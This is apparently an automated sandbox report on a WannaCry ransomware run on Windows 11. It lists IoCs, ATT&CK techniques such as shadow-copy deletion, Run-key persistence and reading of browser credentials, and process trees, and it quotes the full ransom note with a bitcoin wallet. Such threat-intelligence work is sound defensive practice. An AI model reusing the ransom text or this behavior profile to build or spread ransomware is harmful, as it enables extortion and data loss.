wannacry | hxxps://media[.]discordapp[.]net/attachments/1275043807179575339/1315744922506104832/PXL_20241209_181520686[.]jpg?ex=6759d7f2&is=67588672&hm=9770aaa7dac2e5efec915bef9a7a578efea57ca35802ce2c95e3bc25a4467726&=&format=webp&width=454&height=603

Analysis

max time kernel
519s
max time network
507s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
27-12-2024 12:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://media.discordapp.net/attachments/1275043807179575339/1315744922506104832/PXL_20241209_181520686.jpg?ex=6759d7f2&is=67588672&hm=9770aaa7dac2e5efec915bef9a7a578efea57ca35802ce2c95e3bc25a4467726&=&format=webp&width=454&height=603

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer upx worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD361E.tmp	WannaCry (3).EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD3635.tmp	WannaCry (3).EXE

Executes dropped EXE 34 IoCs

pid	Process
692	WannaCry (3).EXE
2452	taskdl.exe
3928	WannaCry (3).EXE
3644	@[email protected]
1888	@[email protected]
4328	taskhsvc.exe
1740	taskdl.exe
2252	taskse.exe
816	@[email protected]
684	taskdl.exe
2016	taskse.exe
876	@[email protected]
3104	@[email protected]
4176	taskse.exe
1388	taskdl.exe
5068	taskse.exe
3952	@[email protected]
5092	taskdl.exe
1164	NRVP.exe
4664	taskse.exe
2388	@[email protected]
4528	taskdl.exe
2480	taskse.exe
5068	@[email protected]
2276	taskdl.exe
3816	taskse.exe
4680	@[email protected]
3136	taskdl.exe
1180	taskse.exe
5052	@[email protected]
2440	taskdl.exe
1820	taskse.exe
356	@[email protected]
3612	taskdl.exe

Loads dropped DLL 8 IoCs

pid	Process
4328	taskhsvc.exe
4328	taskhsvc.exe
4328	taskhsvc.exe
4328	taskhsvc.exe
4328	taskhsvc.exe
4328	taskhsvc.exe
4328	taskhsvc.exe
4328	taskhsvc.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5052	icacls.exe
1960	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tgikesyrkli880 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
37	camo.githubusercontent.com
43	raw.githubusercontent.com
77	drive.google.com
86	drive.google.com
87	drive.google.com
1	raw.githubusercontent.com
3	camo.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCry (3).EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0003000000025654-2751.dat	upx
behavioral1/memory/1164-2800-0x00007FF6D7FB0000-0x00007FF6D7FBC000-memory.dmp	upx
behavioral1/memory/1164-2804-0x00007FF6D7FB0000-0x00007FF6D7FBC000-memory.dmp	upx

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 6 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry (2).EXE:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry (3).EXE:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\NRVP.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\NRVP (1).exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry (1).EXE:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 45 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry (3).EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry (3).EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	NRVP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\NRVP.exe = "11000"	NRVP.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2648	reg.exe

NTFS ADS 11 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 554760.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry (1).EXE:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry (2).EXE:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 919508.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\MLG.rar:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\MLG (1).rar:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\NRVP.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\NRVP (1).exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry (3).EXE:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\MLG.md:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
3172	msedge.exe
3172	msedge.exe
980	msedge.exe
980	msedge.exe
3140	msedge.exe
3140	msedge.exe
4688	identity_helper.exe
4688	identity_helper.exe
4548	msedge.exe
4548	msedge.exe
4532	msedge.exe
4532	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2044	msedge.exe
2044	msedge.exe
1044	msedge.exe
1044	msedge.exe
4328	taskhsvc.exe
4328	taskhsvc.exe
4328	taskhsvc.exe
4328	taskhsvc.exe
4328	taskhsvc.exe
4328	taskhsvc.exe
3160	msedge.exe
3160	msedge.exe
4540	msedge.exe
4540	msedge.exe
3104	msedge.exe
3104	msedge.exe
2704	msedge.exe
2704	msedge.exe
1372	msedge.exe
1372	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 39 IoCs

pid	Process
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe

Suspicious use of AdjustPrivilegeToken 63 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2860	WMIC.exe
Token: SeSecurityPrivilege	2860	WMIC.exe
Token: SeTakeOwnershipPrivilege	2860	WMIC.exe
Token: SeLoadDriverPrivilege	2860	WMIC.exe
Token: SeSystemProfilePrivilege	2860	WMIC.exe
Token: SeSystemtimePrivilege	2860	WMIC.exe
Token: SeProfSingleProcessPrivilege	2860	WMIC.exe
Token: SeIncBasePriorityPrivilege	2860	WMIC.exe
Token: SeCreatePagefilePrivilege	2860	WMIC.exe
Token: SeBackupPrivilege	2860	WMIC.exe
Token: SeRestorePrivilege	2860	WMIC.exe
Token: SeShutdownPrivilege	2860	WMIC.exe
Token: SeDebugPrivilege	2860	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2860	WMIC.exe
Token: SeRemoteShutdownPrivilege	2860	WMIC.exe
Token: SeUndockPrivilege	2860	WMIC.exe
Token: SeManageVolumePrivilege	2860	WMIC.exe
Token: 33	2860	WMIC.exe
Token: 34	2860	WMIC.exe
Token: 35	2860	WMIC.exe
Token: 36	2860	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2860	WMIC.exe
Token: SeSecurityPrivilege	2860	WMIC.exe
Token: SeTakeOwnershipPrivilege	2860	WMIC.exe
Token: SeLoadDriverPrivilege	2860	WMIC.exe
Token: SeSystemProfilePrivilege	2860	WMIC.exe
Token: SeSystemtimePrivilege	2860	WMIC.exe
Token: SeProfSingleProcessPrivilege	2860	WMIC.exe
Token: SeIncBasePriorityPrivilege	2860	WMIC.exe
Token: SeCreatePagefilePrivilege	2860	WMIC.exe
Token: SeBackupPrivilege	2860	WMIC.exe
Token: SeRestorePrivilege	2860	WMIC.exe
Token: SeShutdownPrivilege	2860	WMIC.exe
Token: SeDebugPrivilege	2860	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2860	WMIC.exe
Token: SeRemoteShutdownPrivilege	2860	WMIC.exe
Token: SeUndockPrivilege	2860	WMIC.exe
Token: SeManageVolumePrivilege	2860	WMIC.exe
Token: 33	2860	WMIC.exe
Token: 34	2860	WMIC.exe
Token: 35	2860	WMIC.exe
Token: 36	2860	WMIC.exe
Token: SeBackupPrivilege	3612	vssvc.exe
Token: SeRestorePrivilege	3612	vssvc.exe
Token: SeAuditPrivilege	3612	vssvc.exe
Token: SeTcbPrivilege	2252	taskse.exe
Token: SeTcbPrivilege	2252	taskse.exe
Token: SeTcbPrivilege	2016	taskse.exe
Token: SeTcbPrivilege	2016	taskse.exe
Token: SeTcbPrivilege	4176	taskse.exe
Token: SeTcbPrivilege	4176	taskse.exe
Token: SeTcbPrivilege	5068	taskse.exe
Token: SeTcbPrivilege	5068	taskse.exe
Token: SeTcbPrivilege	4664	taskse.exe
Token: SeTcbPrivilege	4664	taskse.exe
Token: SeTcbPrivilege	2480	taskse.exe
Token: SeTcbPrivilege	2480	taskse.exe
Token: SeTcbPrivilege	3816	taskse.exe
Token: SeTcbPrivilege	3816	taskse.exe
Token: SeTcbPrivilege	1180	taskse.exe
Token: SeTcbPrivilege	1180	taskse.exe
Token: SeTcbPrivilege	1820	taskse.exe
Token: SeTcbPrivilege	1820	taskse.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe

Suspicious use of SendNotifyMessage 36 IoCs

pid	Process
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe
980	msedge.exe

Suspicious use of SetWindowsHookEx 17 IoCs

pid	Process
1432	MiniSearchHost.exe
3644	@[email protected]
3644	@[email protected]
1888	@[email protected]
1888	@[email protected]
816	@[email protected]
816	@[email protected]
876	@[email protected]
3104	@[email protected]
3952	@[email protected]
1164	NRVP.exe
1164	NRVP.exe
2388	@[email protected]
5068	@[email protected]
4680	@[email protected]
5052	@[email protected]
356	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 980 wrote to memory of 1832	980	msedge.exe	77
PID 980 wrote to memory of 1832	980	msedge.exe	77
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 4572	980	msedge.exe	78
PID 980 wrote to memory of 3172	980	msedge.exe	79
PID 980 wrote to memory of 3172	980	msedge.exe	79
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80
PID 980 wrote to memory of 3408	980	msedge.exe	80

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2516	attrib.exe
3404	attrib.exe
3032	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://media.discordapp.net/attachments/1275043807179575339/1315744922506104832/PXL_20241209_181520686.jpg?ex=6759d7f2&is=67588672&hm=9770aaa7dac2e5efec915bef9a7a578efea57ca35802ce2c95e3bc25a4467726&=&format=webp&width=454&height=603
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff801f33cb8,0x7ff801f33cc8,0x7ff801f33cd8
  2⤵
  PID:1832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2
  2⤵
  PID:4572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:8
  2⤵
  PID:3408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
  2⤵
  PID:3308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12891075632118155650,17316584139830031423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
  2⤵
  PID:2508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
